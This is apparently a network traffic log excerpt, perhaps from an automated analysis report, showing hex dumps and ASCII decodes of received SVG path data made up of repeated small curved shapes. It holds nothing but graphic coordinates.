                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7922INData Raw: 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                        Data Ascii: 2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M367,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7938INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 35 32 2c 33 35 32 2e 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c
                                                                                                                                                                                                                                                        Data Ascii: s-9" d="M402.52,352.23a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7954INData Raw: 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 32 2c 31 39 37 2e 39 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M422,197.93a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7970INData Raw: 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: -.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8,2.8,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7986INData Raw: 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 37 39 2c 33 34 39 2e 31 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                        Data Ascii: th class="cls-9" d="M492.79,349.18a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8002INData Raw: 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 32 32 2c 31 39 34 2e 38 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 41 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e
                                                                                                                                                                                                                                                        Data Ascii: ,.18,3.33"></path><path class="cls-9" d="M512.22,194.87a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1A2.8,2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8018INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 41 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2c 35 34 33 2c 32 37 36 61 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: ,1-.91,2.6A2.94,2.94,0,0,1,543,276a2.82,2.82,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8034INData Raw: 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 30 37 2c 33 34 36 2e 31 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M583.07,346.12a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8050INData Raw: 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                        Data Ascii: 8,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8066INData Raw: 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 2,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8082INData Raw: 2d 39 22 20 64 3d 22 4d 33 39 30 2e 32 34 2c 31 35 39 2e 31 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                                                                                                        Data Ascii: -9" d="M390.24,159.13a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8098INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 38 33 2c 33 35 2e 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 34 30 32 2c 33 36 2e 35 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e
                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M405.83,35.3a1.62,1.62,0,0,1-.73,2.09A2.36,2.36,0,0,1,402,36.5a2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8114INData Raw: 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 34 2e 31 35 2c 39 32 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M434.15,92.74a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.7
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8130INData Raw: 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 34 37 2c 31 35 30 2e 31 39 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M462.47,150.19a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8146INData Raw: 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path cla
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8321INData Raw: 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8337INData Raw: 34 2e 39 31 2c 31 34 37 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 4.91,147.74a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.
